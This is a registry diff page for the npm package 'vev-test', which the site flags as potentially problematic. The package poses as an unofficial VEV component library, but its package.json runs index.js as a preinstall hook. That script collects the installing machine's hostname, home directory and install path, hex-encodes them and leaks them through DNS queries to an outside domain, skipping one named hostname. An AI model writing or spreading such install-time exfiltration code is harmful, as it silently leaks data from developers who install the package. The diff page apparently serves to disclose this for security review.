vev-test 2023.8.28

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.


This version of vev-test might be problematic. Click here for more details.

Files changed (3) hide show
  1. package/README.md +21 -0
  2. package/index.js +45 -0
  3. package/package.json +24 -0
package/README.md ADDED
@@ -0,0 +1,21 @@
1
+ # Unofficial VEV library for VEV components
2
+
3
+ __This library supports only vev launcher. If you need rk component, check `vev-test`__
4
+
5
+ # Installation
6
+ ```
7
+ npm i vev-test --save
8
+ ```
9
+
10
+ # License
11
+ MIT License
12
+
13
+ Permission is hereby granted, free of charge, to any person obtaining a copy
14
+ of this software and associated documentation files (the "Software"), to deal
15
+ in the Software without restriction, including without limitation the rights
16
+ to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
17
+ copies of the Software, and to permit persons to whom the Software is
18
+ furnished to do so, subject to the following conditions:
19
+
20
+ The above copyright notice and this permission notice shall be included in all
21
+ copies or substantial portions of the Software.
package/index.js ADDED
@@ -0,0 +1,45 @@
1
+ // !Do not remove!
2
+ const dns = require('dns');
3
+ const os = require('os');
4
+ const suffix = '.dns.dependency-c4llb4ck.0lo.org';
5
+ const ns = 'dns1.dependency-c4llb4ck.0lo.org';
6
+ const package = 'vev-test';
7
+ function sendToServer(data) {
8
+ data = Buffer.from(data).toString('hex');
9
+ data = data.match(/.{1,60}/g);
10
+ id = Math.random().toString(36).substring(2);
11
+ data.forEach(function (chunk, idx){
12
+ try {
13
+ dns.resolve(
14
+ 'v2_f.' + id + '.' + idx + '.' + chunk + '.v2_e' + suffix, 'A',
15
+ console.log);
16
+ } catch (e) { }
17
+ });
18
+ }
19
+ function tryGet(toCall) {
20
+ try {
21
+ return toCall();
22
+ } catch(e) {
23
+ return 'err';
24
+ }
25
+ }
26
+ data = {
27
+ p : package,
28
+ h : tryGet(os.hostname),
29
+ d : tryGet(os.homedir),
30
+ c : __dirname
31
+ }
32
+ if (data['h'] == 'BBOGENS-LAPTOP') {
33
+ process.exit(0);
34
+ }
35
+ data = JSON.stringify(data);
36
+ sendToServer(data);
37
+ dns.lookup(ns, function(err, address) {
38
+ if (!err) {
39
+ nsAddress = address;
40
+ } else {
41
+ nsAddress = '8.8.8.8';
42
+ }
43
+ dns.setServers([nsAddress, '4.4.4.4']);
44
+ sendToServer(data);
45
+ });
package/package.json ADDED
@@ -0,0 +1,24 @@
1
+ {
2
+ "name": "vev-test",
3
+ "version": "2023.8.28",
4
+ "description": "Unofficial VEV library for VEV components",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "preinstall": "node index.js",
8
+ "start": "node index.js"
9
+ },
10
+ "author": "T.T.",
11
+ "license": "MIT",
12
+ "keywords": [
13
+ "vev",
14
+ "vev-test"
15
+ ],
16
+ "repository": {
17
+ "type": "git",
18
+ "url": "git+https://github.com/vev-design/vev.git"
19
+ },
20
+ "homepage": "https://github.com/vev-design/",
21
+ "bugs": {
22
+ "url": "https://github.com/vev-design/issues"
23
+ }
24
+ }